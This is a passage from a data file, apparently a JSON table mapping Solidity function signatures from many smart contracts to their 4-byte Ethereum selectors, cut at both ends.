"0xabcd7960", "notEqual(bool,bool,string)": "0x44781a00", "equal(bool,bool,string)": "0x767392b3", "isFalse(bool,string)": "0xdf0f3e1c", "isTrue(bool,string)": "0x1042604f", "isNotZero(address,string)": "0xf327b7fc", "isZero(address,string)": "0x25fa0131", "notEqual(address,address,string)": "0xb8f28531", "equal(address,address,string)": "0xbfba5dd6", "isNotZero(bytes32,string)": "0xc37db253", "isZero(bytes32,string)": "0x33967c74", "notEqual(bytes32,bytes32,string)": "0x556fe562", "equal(bytes32,bytes32,string)": "0xea79dd79", "isNotEmpty(string,string)": "0x8aeb8f98", "isEmpty(string,string)": "0x91872a91", "notEqual(string,string,string)": "0x49f97939", "equal(string,string,string)": "0xe8c2cb16", "fail(string)": "0x78122f3a", "addMod(uint256,uint256,uint256)": "0xb12fe826", "authorizePayment(string,bytes32,address,uint256,uint256)": "0x20ea2533", "Vault(address,address,uint256,uint256,address,uint256)": "0x3422ede1", "changeEscapeCaller(address)": "0x681617c7", "Escapable(address,address)": "0xf898f8ab", "test2ContractVote()": "0x90f0fef0", "test1Vote()": "0xd935bac3", "test0Vote()": "0x07df18d3", "getSubscriptionLastPaid()": "0xab1b1cb5", "getSubscriptionFee()": "0x6e3532fa", "hasVoted(uint256)": "0xecca031f", "getPoster(uint256)": "0x07e63412", "getText(uint256)": "0x7f4ef9d4", "getTitle(uint256)": "0x929a79b1", "sortTopPosts()": "0x6b425093", "voteWorth()": "0xbbc84d1a", "createPost(uint256,uint256)": "0xfb598f87", "deletePost(uint256)": "0x094cd5ee", "paySubscriptionFee()": "0x4b3ab5bf", "changeSubscriptionFee(uint256)": "0x0c938c3f", "RewardForum(uint256)": "0xca585774", "_getDepth(uint256)": "0x9fb4d1b0", "_setProposal(uint256,string,bytes32,bytes32,bytes32,string,uint256,uint256)": "0xe643d63c", "getProposalByIdIteration(uint256,uint256)": "0x0afb9f1f", "newIteration(uint256,string,bytes32,bytes32,bytes32,string,uint256,uint256)": "0xd13f9d55", "newProposal(string,bytes32,bytes32,bytes32,string,uint256,uint256)": "0x5b905b6c", "priceFactorA()": "0xfd221889", "currentRecords()": "0x52d5ad25", "advisorsAndPreICO()": "0xc2572c51", "villagesSold()": "0xad81cd90", "FUTURE_DEVELOPMENT_POOL()": "0x751ecea0", "TotalEDUSupply()": "0xc5105bb5", "totalWeiAmountSale1()": "0xdc693ca7", "PreIcobonusEnds()": "0xbaf5fbff", "lockRequestCount()": "0xcb81fecf", "totalLockedBonus()": "0x7ef01fb9", "swapOpen()": "0xba93d980", "minIcoTokenLimit()": "0xb0837524", "btc()": "0xa28d57d8", "MIN_TOKEN_UNIT()": "0x2803d8e5", "restrictedAddress()": "0x7f4ae68d", "keeppetToken()": "0x8b22c7b3", "intrepidShipMinted()": "0xf8e39177", "endThirdPeriodTimestamp()": "0x416dc762", "sehrRaised()": "0xe3fe6a9e", "_rewardPoS()": "0xa85688d2", "stopDefrost()": "0xb643f2c9", "destroyedBots()": "0x61b6683c", "transformDataContract()": "0x93cc6d85", "targetDiscountValue10()": "0x6aa66cd4", "initialFunding()": "0x859971dc", "OfficalHold()": "0x82c6b2b6", "signatureOwner()": "0x1087452c", "gasPayback()": "0xe1538b32", "DIP_Pool()": "0x367c574f", "ICO_MIN_CAP()": "0x31a3b873", "unfreezeSupply()": "0x6693b694", "start_amount()": "0x196667e4", "bonusLimit2()": "0x8442171d", "targetDemographics()": "0x965a3b7e", "referralMinimum()": "0x9b12664f", "earlyExchangeRate()": "0x133f6ac0", "getObserverCount()": "0x77215c8d", "mtdAmount()": "0x61a227b6", "appFund()": "0x55810d11", "DEPOSIT_PERIOD()": "0xfd090e47", "icoStartTime()": "0xa7c3d71b", "TACTICALCRUISER_MAX_CARGO()": "0x9678fb88", "withdrawByResque()": "0x872fe620", "TACTICALCRUISER_EXTRACTION_BASE()": "0x5d5d4fab", "tokensTradeable()": "0xcbdc5aa4", "ownerDivRate()": "0xfd01d4a1", "sendOnRequest()": "0xbf5371e3", "tokenPerWai()": "0x208838c8", "currentHighestBid()": "0xcc7d1a0f", "oneBillion()": "0x448a9915", "champion()": "0x44866955", "REBELCOINSupply()": "0x1365e6a3", "phase4EndBlock()": "0xc588415e", "auctionedEth()": "0xd276a3e1", "MAX_PERCENT()": "0x1036bbe2", "preSaleVault()": "0xb5740cc2", "SteemitFund()": "0x145e6701", "monarchyEndReward()": "0xec560828", "tokenUnit()": "0xe93c980d", "lastBlock_f0Hash_uint256()": "0xdd817963", "configurer()": "0x35c77e6f", "BONUS_TIER_3_LIMIT()": "0xb175a0d2", "RECEIVER_ADDRESS()": "0xbfd17831", "startRoundB()": "0x3200aa7a", "accumulatedHours()": "0x66f7d9da", "RewAddr()": "0x453ca7ee", "isCrowdsaleStopped()": "0x4d8a9310", "EQUIPMENT_REWARD_TOKENS_NUMS()": "0x21a7d652", "VIP_MINIMUM()": "0x16b7d8f2", "newUsers()": "0x7dd10e4f", "ACTIVE_LOAN_CANCELED_BY_LENDER_STATUS()": "0xd598cae5", "nextTimeout()": "0x9e4734ba", "migrationAddress()": "0x71c396cc", "getRunningAuctions()": "0x1245f45e", "XTVBurned()": "0xb5c2b889", "numTiers()": "0x40445a4f", "getCabCoinsAmount()": "0x3c8cd434", "minimumInvestment()": "0x2b925b25", "fourthRoundPercent()": "0x7d9fb742", "GenesisSalesCount()": "0x7dce8dd4", "votingProxyContract()": "0xa9f8792e", "crowdSalePause()": "0xa40bc352", "vestingFounderAllocation()": "0xb7581c67", "incentiveDistributed()": "0x8a4be59e", "we()": "0x73a7dfda", "nDeposits()": "0x9cff53e0", "remainingBountySupply()": "0xfd138223", "tixPresale()": "0xa7a1019d", "totalAllocatedToTeam()": "0xe783bfb1", "storedDataInBytes()": "0xbe041614", "soldForSecond()": "0x049cc8b1", "BETTING_OPENS()": "0x22b9b712", "minShare()": "0x8bb28de2", "maxChangeFee()": "0xdef7eb44", "CommunityWithDraw()": "0x2d46253f", "numDistributionsRemaining()": "0x48c5be67", "received_wei_with_bonus()": "0xc5340dcd", "transferFee_()": "0xcb8cd7cb", "nextTournamentRound()": "0x62e881a4", "numPolls()": "0x842ff2bd", "activateContract(address,address)": "0x87630a2e", "Controllable()": "0x1d209605", "Stalincoin()": "0x6eb85627", "setEndIcoMainICO(uint256)": "0xdcbad97b", "setStartIcoMainICO(uint256)": "0x3af9e169", "setEndIcoPreICO(uint256)": "0xafaaa654", "MintableLazyCoderToken()": "0xcf7d0304", "LazyCoderCoin()": "0x2ea68d4b", "contractTransfer(address,address,uint256)": "0xf7ad906f", "restartMinting()": "0xc12954fa", "disableBurning()": "0x98603cca", "enableBurning()": "0x7581a8e6", "Stockfinex(uint256,string,uint8,string)": "0xf543d3c6", "withdrawPonzi(uint256)": "0xebf89fa9", "setDiscountPercent(uint256,uint256)": "0x66c71952", "discountPercent()": "0x29ef1919", "manualInitializeTreasure(uint256)": "0x7bb1efa1", "manualFinishGame(uint256)": "0xeb7550d8", "getUnfinishedGames()": "0x4ecf77d3", "setAdminVariables(uint256,uint256,uint256,uint256)": "0xadd5eb02", "finishGame(uint256)": "0xcfe186b2", "distributeGame(uint8,uint256)": "0x7fad54e4", "initializeTreasure(uint256)": "0x892f81df", "refundTeamTokens()": "0x6cfedade", "adminRefundTokens(address,uint256)": "0xba8b9712", "adminSendTokens(address,uint256)": "0x74583772", "Presale(address)": "0xe8e7426e", "PapushaToken()": "0x3299ad23", "setConfigString(string)": "0x1c51a8e0", "setPortUpdate(uint16)": "0x4c86c2e5", "setPort(uint16)": "0x21a8a771", "setSlaveServer(uint32)": "0x8e8afc34", "setMasterServer(uint32)": "0x0b1a8e1e", "tokens()": "0x9d63848a", "getBlocksUntilNextRound()": "0xfaaad90f", "changeRoundDelay(uint256)": "0x23bfc777", "updateDonateTokenAddress(address,uint256)": "0x68660b93", "addDonateTokenAddress(address)": "0xd19e2364", "withdrawOwnerToken(uint256)": "0x93358320", "withdrawOwnerEth(uint256)": "0x9c700b70", "changeRatesToken(uint8,uint256)": "0xdbaf5ce7", "cancelToken(uint256)": "0x382faa6a", "getBalanceEthContract()": "0x20c8580f", "depositToken(address,uint8,uint256)": "0x59e6800c", "setContractErc20Token(address,address)": "0xb931bec5", "setContractStakeToken(address,address)": "0x9be1eab7", "RapidProfit(address)": "0x68c64670", "getBalanceTokenContract()": "0x398c7424", "depositToken(address,uint8,uint256,uint256)": "0x69671622", "DMRToken()": "0x3cfaaca0", "TurtleToken(uint256,string,string)": "0xfce78e5e", "LEXTokensContract()": "0x58ad4673", "INDOCASH()": "0xec505f58", "POSV()": "0x9d94c343", "releaseMany(address[],uint256[])": "0x2d56d572", "release(address,uint256)": "0x0357371d", "Token(uint256,string,uint256,string,string,address)": "0x9a54596b", "calculateNoOfTokensToSend()": "0x8523930a", "determineCommissions()": "0x2b0e64b3", "devAllocation(address,uint256)": "0xd4fbe1e0", "contributePublic()": "0x36335e19", "determineStatus()": "0x2975659d", "Crowdsale(uint256,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x2d3b634c", "vestedAmount(uint256)": "0x1bfce853", "vestedAmountAvailable()": "0x35593bcf", "returnVestingSchedule()": "0x25d104d4", "TokenVesting(uint256,uint256,uint256)": "0xa92f0c80", "checkForNewLeader(uint256)": "0x955b1535", "threshold()": "0x42cde4e8", "Timebomb()": "0x0bd3cf7e", "setMentorsTokensWallet(address)": "0x73f3312d", "setReservesForExchangeTokensWallet(address)": "0xbe354949", "setFABAcompanyTokensWallet(address)": "0xc71f311c", "setSoftwareTokensWallet(address)": "0x49ec1ff0", "setMentorsTokensPercent(uint256)": "0x4779fad9", "setFABAcompanyTokensPercent(uint256)": "0x84c6a9fe", "setReservesForExchangeTokensPercent(uint256)": "0x74091685", "setSoftwareTokensPercent(uint256)": "0xfb18962d", "Brewers()": "0xaf2a7fb2", "COLETOKEN()": "0x2fbc2449", "FreeCoin()": "0x6802c8a1", "Gnosis()": "0xd491461a", "Arascacoin()": "0x87ba67dd", "Academicon(uint256,uint256)": "0x3b9ff58e", "LKB(uint256,string,string)": "0x81333d57", "MthereumToken()": "0x7ec62cf7", "newMinimumTokens(uint256)": "0xfea22ae4", "FLC()": "0x0fb553ba", "EtfToken()": "0x0ca6afa7", "MintableTokenWithMinters()": "0xc07a5537", "ZoologicalGarden()": "0x49e284d1", "VETRA()": "0xf0ec747e", "addPack(address[],uint16)": "0xf251bc8c", "approveAndCallN(address,uint256,uint256)": "0x4024eb2a", "MANXERC20()": "0x542b5111", "_strConcat(string,string)": "0x89e8beb3", "factTeamOf(uint256)": "0xae81a54b", "setCreationPrice(uint256)": "0xa9831437", "create(bytes32,address)": "0x663ff5a9", "appropriate(uint256)": "0xf07c44c2", "TakeMoney()": "0xe8f1736c", "SetDataServerAddress(address)": "0x97f3de37", "buyTokensFromContract(address,uint256)": "0xdba56cb8", "RedBlueToken3()": "0xa38f18a0", "NextGenHype()": "0xc036c100", "setTestVar(uint256)": "0xaf086d6f", "uint2str(uint64)": "0x85de4841", "createTokenUri(uint8,uint8,uint64,uint64)": "0xea1325be", "create(uint8,uint8,uint64,uint64)": "0x2c57fdf4", "burnTokens2(uint256)": "0xb12155a9", "buyKeys(uint256,string)": "0x2cfa74da", "valuePerMicroKey()": "0x9264ee57", "getWeiPriceMicroKeys()": "0x4ca3a111", "nome_candidato_da_indice(uint256)": "0x642f1ddc", "Nome_vincitore()": "0x32c66a9d", "indice_vincitore()": "0xd17f5d9d", "vota_un_candidato(uint256)": "0x2c882333", "_changeManagerImpl(address)": "0x26a8d1e5", "_destroyImpl()": "0x6540dc07", "transferHotel(address,address)": "0x292d64e0", "revertTransfer(address,uint256)": "0xc480e583", "emitTokens(uint256)": "0xd78b16a1", "insertHash(uint16,uint8,uint8,string)": "0x8218e540", "viewMerkleHash(uint16,uint8,uint8)": "0x54c41fb9", "ApcrdaZebichain()": "0xe4115a8c", "distribToken(address)": "0x13612119", "Notonegoro()": "0xafbfdd93", "registerName(uint256,bytes32)": "0x3659467b", "registerPID(address)": "0x0bd263ff", "etherToSendBankroll()": "0x9baf7ffb", "payBankroll()": "0x58172da1", "OmniDex()": "0xbf611c78", "AcceptsOmniDex(address)": "0x8ce2f386", "ExtremiumToken()": "0x3756e207", "SmartBondsToken()": "0xfc2d2b69", "approveAndCall(address,uint8)": "0x2085f554", "loseWager(uint256)": "0x67b5496a", "NAABHAToken()": "0x0a8c138e", "CPTestCoin()": "0xee428514", "receiveTokenLoot(uint256[9],uint256,uint8,bytes32,bytes32)": "0x8261b6bf", "papu()": "0xd5ecc1bd", "operator()": "0x570ca735", "interact()": "0x52337ab0", "unhaltsTrades()": "0x1609a397", "haltsTrades()": "0xc2775347", "withdrawFundToAddress(address)": "0xc729a567", "withdrawFundToOwner()": "0x39909f0b", "sellPBTTAgainstEther(uint256)": "0x7bf21ab8", "buyPBTTAgainstEther()": "0xd60f2eae", "setPBTTForGas(uint256)": "0x02259b07", "setGasForPBTT(uint256)": "0x0615f7c3", "HzxhcToken(address,address)": "0x4224f2ca", "JaiHoToken()": "0xfd1094a9", "reevaluateETHPrice(uint256)": "0x27db9e82", "reevaluateICO(uint256)": "0xd80e821c", "RUNEToken()": "0xdb0436c2", "AbroToken()": "0x141c4306", "onXon()": "0xe57e5741", "alicoinToken()": "0x77073437", "HuaTuo()": "0xf75beacf", "AanshuToken()": "0x56af4d4e", "New(string,bytes32)": "0xed8df164", "Begin(string,string)": "0x74c272b7", "Answer(string)": "0xe94e83d8", "vbtToken()": "0x101b7e7c", "sacredToken()": "0x57f91458", "SPEX()": "0x4ddc8f74", "approveUser(address,uint256)": "0x4248083b", "GC()": "0x09dba083", "getMoveCount()": "0x1dc45248", "reGround(uint256)": "0x3fdb571f", "endGround(uint256)": "0xf31fe982", "callforhelp(uint256)": "0xfe1bae83", "move(uint256)": "0x87cb15f7", "Apen()": "0xa7bb959a", "MacoTestCoin()": "0x76fd7951", "SWIFTH(address,address[],address)": "0xdac6af5e", "CLX()": "0xef9b559a", "killCoin()": "0x814b53b0", "queryBalanceMinter()": "0x79f9578c", "setInstructor(string,uint256,string)": "0xd6f4c235", "permitBurning(bool)": "0x61025532", "setCommunityLock(address)": "0x4f93b9e8", "doBurn(address,address,uint256,bytes,bytes)": "0x2c416754", "doSend(address,address,address,uint256,bytes,bytes,bool)": "0x7e600c87", "printStats()": "0xffcbb5df", "customPedro(uint256,uint256,bool)": "0xb51d42a2", "getNumData(uint256)": "0xf1fd9614", "getNum(uint256)": "0xf3358ac4", "ChallengeToken()": "0x7e9266bb", "acceptChallenge(uint256)": "0x1b0fc106", "claimReward(uint256,address)": "0xe70eb392", "addReward(uint256,uint256,address)": "0x283b19bf", "createWithReward(string,bool,uint256,address)": "0x3a4027bb", "create(string,bool)": "0xcc10e401", "isRoundEnd(uint32)": "0x235e5d47", "retrieveUportInfo()": "0x4f96ab8e", "updateUportInfoFromOracle(string,address,address)": "0x029deeb0", "updateUportInfo(string)": "0xf216bfd6", "transferOracle(address)": "0xe7326806", "BalanceDB()": "0xb1adc241", "setEthToCents(uint256)": "0x034187fd", "getSaleConfig()": "0xcea943ee", "getSaleStatus()": "0x8c3c4b34", "unlock()": "0xa69df4b5", "getPayout(address)": "0x8006745b", "getProxy(address)": "0xb7fba4d3", "regProxy(address)": "0x8c0e2a31", "regProxy(address,address)": "0x5bd74490", "sendFunds()": "0x8d68cf59", "isEnded()": "0xa4fd6f56", "endDate()": "0xc24a0f8b", "periodThree()": "0xbb7859b5", "periodTwo()": "0x3f5b7675", "startDate()": "0x0b97bc86", "getPeriod()": "0x1ed24195", "goalReached()": "0x7d3d6522", "claimFounders()": "0x0c77a697", "claimFor(address)": "0xddeae033", "getSaleInfo()": "0xdb83694c", "totalCents()": "0xbc126ba1", "TokenSales(address)": "0xf0e959f9", "totalWei()": "0x6d98e9fc", "ProxyPayment(address,address)": "0x4551b1d7", "myInfo()": "0x85b31d7b", "userInfo(address)": "0x1959a002", "purchase(address,uint256)": "0x8de93222", "proxyPurchase(address)": "0x4a5dddd2", "weiToCents(uint256)": "0x6d568c43", "calcShare(uint256,uint256)": "0xab519020", "ppb(uint256,uint256)": "0xf697a0ed", "Config()": "0xfedfd535", "decline(uint256)": "0xa0355f4e", "approve(uint256)": "0xb759f954", "request(address,uint256)": "0xc8c01a55", "withdraw(address,uint256)": "0xf3fef3a3", "unauthorizeManager(address)": "0x17623e5b", "authorizeManager(address)": "0x267c8507", "unauthorizeUser(address)": "0x478aa69e", "authorizeUser(address)": "0x67c2a360", "balance()": "0xb69ef8a8", "CoreWallet()": "0xc4254c7b", "funds()": "0xc89f2ce4", "getProposal(uint256)": "0xc7f758a8", "proposeDissolve(bytes)": "0xd205ad7d", "propose(bytes,uint256)": "0xbade6033", "iPropose(bytes,uint256,bool)": "0x8a3bc2bc", "Dao(address)": "0xdcc0ccf3", "budget()": "0xed01bf29", "releaseTokens()": "0xa96f8668", "releaseBadges()": "0x052b81c7", "vote(bool,uint256)": "0x10e6e06c", "voteDecline(uint256)": "0x27a5c7c6", "voteApprove(uint256)": "0xd78c20ff", "getMyInfo()": "0x7daa10ce", "getUserInfo(address)": "0x6386c1c7", "getStatus()": "0x4e69d560", "getInfo()": "0x5a9b0b89", "pledge(bool,uint256)": "0xdacaeb07", "pledgeDecline(uint256)": "0x40b31937", "pledgeApprove(uint256)": "0xd630bd53", "calcShare(uint256,uint256,uint256)": "0x1ba326c4", "partsPerBillion(uint256,uint256)": "0xaed8f3da", "Proposal(address,address,address,bytes,bool)": "0x1afccfa5", "resolveFailVote()": "0x921f98bb", "resolveVoting()": "0x299e7318", "resolveFailPledge()": "0x45a3b0bf", "resolvePledging()": "0xac996e7e", "parseInt(string,uint256)": "0xbf4d89b5", "parseInt(string)": "0x42346c5e", "strConcat(string,string)": "0xff74927b", "indexOf(string,string)": "0x8a0807b7", "strCompare(string,string)": "0xe8641652", "parseAddr(string)": "0xa6823189", "oraclize_setProof(bytes1)": "0xd7c26adb", "oraclize_cbAddress()": "0xbcf175c8", "oraclize_query(string,string,string,uint256)": "0x2c85f8e0", "oraclize_query(uint256,string,string,string,uint256)": "0x65a4dfb3", "oraclize_query(uint256,string,string,string)": "0x5731f357", "oraclize_query(string,string,string)": "0x346b306a", "oraclize_query(string,string,uint256)": "0xae152cf4", "oraclize_query(uint256,string,string,uint256)": "0x056e1059", "oraclize_query(uint256,string,string)": "0x7975c56e", "oraclize_query(string,string)": "0x489306eb", "oraclize_setNetwork(uint8)": "0x6b3fdc5a", "getAddress()": "0x38cc4831", "setProofType(bytes1)": "0x688dcfd7", "useCoupon(string)": "0x60f66701", "getPrice(string,uint256)": "0x2ef3accc", "getPrice(string)": "0x524f3889", "query2_withGasLimit(uint256,string,string,string,uint256)": "0x85dee34c", "query2(uint256,string,string,string)": "0x77228659", "query_withGasLimit(uint256,string,string,uint256)": "0xc51be90f", "query(uint256,string,string)": "0xadf59f99", "payReward()": "0x7842a3a4", "payOneTimeReward()": "0x36dfe260", "TokenCreation(uint256,uint256,address,string,string,uint8)": "0x69431ab6", "divisor()": "0x1f2dc5ef", "refund()": "0x590e1ae3", "createTokenProxy(address)": "0xbaac5300", "setPriceToken(uint256)": "0x8270c41e", "FooozCrowdsale(address,address)": "0x14d04e06", "changeOwnerTwo(address)": "0x09362a6a", "SpeedCashTokenContract()": "0x97a0a3ec", "withdrawContractTokens(address)": "0xfd7611c7", "airdropMDL(address[],uint256)": "0x1d461b83", "MDL()": "0xe91dcba1", "People(uint256,string,uint8,string)": "0x3e96c107", "POXToken(address,address)": "0x0875029e", "FootballToken(uint256,string,uint8,string)": "0x968997fb", "theCyberGatekeeper()": "0xff59f3cc", "getFile(uint8)": "0xccf53a84", "setContent(uint8,string,string)": "0x02bb8465", "setHashes(uint8,string,string,string,string)": "0x727a899a", "IRPToken()": "0xfe0030d9", "ChivesToken()": "0x8e5ef8fe", "GermanCoin(address,address)": "0x85ef5a8a", "DTCC_ILOW_4()": "0x053902f6", "OXGOLD()": "0xe6ffd50d", "setAirdropStatus(bool)": "0x08ed0236", "mintAirdropToken(uint256)": "0x417de5b5", "NetkillerAdvancedTokenAirDrop(uint256,string,string,uint256)": "0x4353401f", "Lockup6m_20180801(address)": "0xa8beb2cf", "gettime()": "0x16d061a5", "setstart(uint256)": "0xb2860396", "hack()": "0x4de260a2", "Akilos()": "0x08782469", "WBT()": "0x7fec1b7a", "received_tokens()": "0x5fcf92ef", "force_received()": "0x01dd91c0", "set_address(address)": "0x09270ef4", "DurioToken(string,string,uint8,uint256)": "0x4ee3c579", "getPrediction(uint256,uint256)": "0x1b0a102c", "getTotalPrediction(uint256,uint256)": "0x94f92322", "finishGame(uint256,uint256)": "0xd5723bf7", "calculatePrize(address,uint256,uint256)": "0xbf10bde1", "redeem(uint256,uint256)": "0x7cbc2373", "predictWinner(uint256,uint256,uint256)": "0xbc0fb9a0", "createGame(string,uint256,uint256)": "0x0b6d715b", "canBet(uint256)": "0x364e69b7", "ClearToken()": "0xe9f84c5b", "GMSToken(uint256,string,uint8,string)": "0xae69ccdc", "RYANTOKEN()": "0x02a2e105", "onOffCrowdSale(bool)": "0x1c82a013", "drawEther()": "0x086c2e09", "setNote(uint256,bytes20,string)": "0x4bdc44ae", "addNote(bytes20,string)": "0x4bda2ad0", "BossContract()": "0x161448df", "CLIBUXCoin()": "0x96f36997", "finishSunning()": "0x99820e96", "tossIntoTheFire()": "0x53a3b71e", "passToken(address)": "0x191d8cd7", "PabloPlusToken()": "0x56e8b3ac", "CitiDynamicsCoin()": "0x52b566e4", "Centhereum()": "0x49f0726d", "getToJackpot(uint256,uint256)": "0x7d5dc538", "GoodDayToken()": "0xd77371e0", "minechaincoin(uint256,string,uint8,string)": "0xa428033f", "AppleCoin()": "0x4c77a28d", "PumpToken()": "0xbff5e021", "_now()": "0xb3bb8cd4", "_processVestingRules(address,address)": "0x21d365af", "addVestingRule(address,address,uint256,uint256)": "0xb6c4da52", "processMyVestingRules()": "0x75545cb2", "processVestingRules(address,address)": "0x982b5dd2", "markReleased()": "0xd59138ef", "setFundingLowcapReached(uint256)": "0xb469d6c8", "setTransferWhitelist(address,address,bool)": "0xfee3154c", "setAgent(address,address,bool)": "0xb214691c", "createPlayer(uint32[7],uint256,address)": "0xe5f2806a", "getPosition(uint256)": "0xeb02c301", "PlayerToken()": "0x38beb446", "PocketChain()": "0x2c7b0085", "METAXCrowdSale()": "0x695e2a30", "SendEtherToBoard(uint256)": "0x3d3b1c02", "getRedeemEst(address,uint256)": "0x12f8ae31", "RedeemMTU(bool)": "0x15a6a38d", "DepositMTU(uint256)": "0xcd3f7a50", "SetRedeemRate(uint256)": "0xba441560", "ClaimMTU(bool)": "0x6e6fe3d6", "getClaimEst(address)": "0x3530e895", "SetClaimRate(uint256)": "0x2e1b7f08", "setCharge(bool)": "0x50bda35a", "FreezoneToken()": "0xbbbdef70", "certifyMany(bytes32[])": "0x6c204fd7", "_certify(bytes32)": "0x9d1ffed9", "setCertifierId(address,string)": "0x1b2dba8c", "setCertifierStatus(address,bool)": "0xde0f2b49", "AfterSchoolCrowdsaleToken()": "0x2b7be84b", "SparkToken()": "0xdccb98da", "StfuTokenCrowdsale()": "0x4869854a", "StfuToken()": "0x23210c1a", "RHP()": "0x026c0d8f", "_isExcluded(uint256)": "0xbab54f69", "_add(uint256,address)": "0xb12b714f", "add(uint256,address)": "0x2b8bbbe8", "EthergotchiOwnershipV2(address)": "0x5da03ff8", "uint256ToBytes32(uint256)": "0x5edb2fb3", "concatenate(string,string,string,string)": "0x0159a91d", "deactivateContract(address,address)": "0x47bb0613", "lendGovernmentMoney(address)": "0xd95a2d42", "len(bytes32)": "0x166c4b85", "LeaderMessage()": "0x9fb25d9e", "LeaderHash()": "0xfa6d373c", "latestMonarchInternal()": "0x7075b1d8", "last()": "0x47799da8", "kissBTCCallback(uint256,uint256)": "0x07e00bcb", "KissBTC()": "0x31ae0019", "Kingdom(string,address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x5e68ac2c", "KingdomFactory()": "0x7e81b6aa", "kingAutomaticCollectFee()": "0xb0c7f709", "killBoardProposal(uint256,address)": "0x179b73da", "kill2()": "0x2bb685bc", "kill1()": "0x73abecbb", "Kill()": "0xbe26733c", "keccak()": "0x775dec49", "Kardashian()": "0xc53ad76f", "jumpIn()": "0x691fb8ea", "_jSub(uint256,uint256,uint256,uint256)": "0x1ecfe64d", "join_game(uint256)": "0x4a7b26ec", "_jMul(uint256,uint256,uint256,uint256)": "0x5b764811", "jesterAutomaticCollectFee()": "0x9743dfc1", "_jDiv(uint256,uint256,uint256,uint256)": "0x5f972df8", "JamCoin()": "0xed64bea4", "_jAdd(uint256,uint256,uint256,uint256)": "0x0138e31b", "ivote(bool)": "0x3b46a7df", "iterateTable(uint256,uint256)": "0x99aeade3", "isWinningBet(uint256)": "0x6662e4be", "isValidChainyJson(string)": "0x04d10f1c", "isUser(address)": "0x4209fff1", "isThisPuritanicalVersion()": "0x7c4c27c8", "isThisPreforkVersion()": "0xaf5610dd", "isThisHardforkedVersion()": "0x4adcbd19", "issueTokens(address,uint256)": "0x475a9fa9", "issuetender(address,uint256,uint256)": "0x40fdf515", "issueLetterOfCredit(uint256,uint256,uint256)": "0x05d87fe2", "issueIOU(string,uint256,address)": "0x3e5cee05", "isProxyLegit(address)": "0x245a6f74", "IsPayoutReady__InfoFunction(bytes32)": "0x6534b4e2", "isModule(address)": "0x42f6e389", "isLosingBet(uint256)": "0xaa51793c", "_isHuman()": "0x88eb7af7", "_isCycleValid(uint256)": "0x5445e38c", "isCreated(bytes32)": "0x2f553d31", "_isContract()": "0x57eaeddf", "isClosed()": "0xc2b6b58c", "isClassic()": "0x37b0574a", "isCertifier(address)": "0x1c2353e1", "isCertified(address)": "0x5afa5036", "isCertification(address,bytes32)": "0xda7d0082", "_isBoardMember(address)": "0xfc1f7652", "isAdmin(address)": "0x24d7806c", "isActiveRegistrant(address)": "0x1cf52f2b", "isAccountLocked(address)": "0x74eb9b68", "_is360thDay()": "0x76285b5b", "InvestWithdraw()": "0x2afb21bc", "investInTheSystem(uint256)": "0xc4321adb", "investInTheSystem()": "0x4f013184", "InvestCancel()": "0x391f2e96", "InvestAdd()": "0xadfe6b80", "_inverse(uint256)": "0x8cecf66e", "InsuranceAgent()": "0xf83d96c1", "InstantLottery(address,address,bool,address)": "0x46af23f5", "insertProfitHere()": "0xfeaa29d8", "inputToDigit(uint256)": "0xa0469b02", "inKissBTC(uint256)": "0x98eaca94", "initStats(string,address,uint256)": "0x23584a21", "initContract(string,string,uint256,uint256)": "0x87ebd76c", "init(address,bytes32)": "0x2cc0b254", "inheritToNextGeneration(address)": "0x4a1f0bf6", "Infos()": "0x9334ab61", "inEther(uint256)": "0x1f13de92", "index(int256,uint256)": "0x22686250", "incrUserOnholdBal(address,uint256,bool)": "0x3d5db1c2", "incrUserAvailBal(address,uint256,bool)": "0x1e8c72b4", "_incrementState()": "0xcab5c0f1", "increaseInvestment()": "0xa4beffa7", "InchainICO(address[],uint256)": "0x602acca1", "immortality()": "0xf7c3ee7a", "id()": "0xaf640d0f", "identify(bytes32)": "0xdaf22f4d", "IconomiToken(uint256,string,uint8,string,uint256)": "0xb98fdc36", "IconomiTokenTest(uint256,string,uint8,string,uint256)": "0xa6027d53", "Honestgamble()": "0xef4ffee2", "hintURL(int256,bytes32,string)": "0xc98031be", "hint(int256,bytes32,string,bytes20)": "0x7eb69ba1", "Highlander()": "0xaeeb96af", "heroOfThePit()": "0xce373b95", "helpRed()": "0x353928d8", "helpBlue()": "0x06f36cc9", "hasRelation(bytes32,bytes32,address)": "0xa1add510", "HashToken()": "0x650955d4", "hashTo256(bytes32)": "0xcb96012e", "handleBet(uint256)": "0x4f28af6a", "halt()": "0x5ed7ca5b", "HackerGold(address)": "0xdf143fb7", "Guess(uint256)": "0x75f96ead", "GSIToken(uint256,string,uint8,string,address)": "0xa1c95ac2", "GSI()": "0x3cc7790a", "GridMember(string,uint256,bool,address,address)": "0x92ba4ba6", "Stage1Deadline()": "0x8007604b", "suspendedPayments()": "0x1d0a3cb8", "DIV()": "0xc4b35f3d", "getMetrics()": "0x7606f781", "expiryLimit()": "0x07a8af6f", "MIN_BET_AMOUNT()": "0x6475e3d3", "allowMigrate()": "0xe7804444", "cashInRate()": "0x672324ac", "bnCheck()": "0x67085dab", "BUY()": "0x01ab9806", "NextItemID()": "0x2d1f0021", "WALLET_ADDR()": "0x44169752", "ILFManagerCandidate()": "0xae788b34", "addressSCComplianceService()": "0xa708142b", "applyMC()": "0x10cbe445", "against_proposal()": "0x6195c713", "indPreSale()": "0x4d610837", "decimalPrecision()": "0xc4efa665", "PUBLICSALE_ENDTIMESTAMP()": "0xfdbab5f5", "lastRound()": "0x82bc07e6", "TOKEN_FIRST_EXCHANGE_RATE()": "0x106f6a3d", "wolkAddress()": "0xfd3c1c43", "foundingTeamSupply()": "0x8e86077b", "latestUpdate()": "0xe360a49e", "GAS_PRICE()": "0x8b0ee5a3", "redeemedTokens()": "0xd86b8739", "approveOnly()": "0x60938601", "lowTokensToSellGoal()": "0x6557b677", "donations()": "0xe8757d19", "getEtherContributed()": "0x83ccc8b8", "tokensForAdvisory()": "0x24a27bd2", "startTimeInSec()": "0x99879bb9", "SIZE()": "0xbdffd282", "totalSupply2()": "0x96178c20", "distributionContract()": "0x5a4528c2", "LatestRechargeTime()": "0xe83d1c5e", "miningLeader()": "0xea0a93e2", "platformAddress()": "0xdbe55e56", "teamTwoDivsTotal()": "0x33cbee23", "PRE_SALE_300_ETH()": "0x6133a0eb", "tokenPreSaleCap()": "0x5cf469ca", "stopAddressesTotal()": 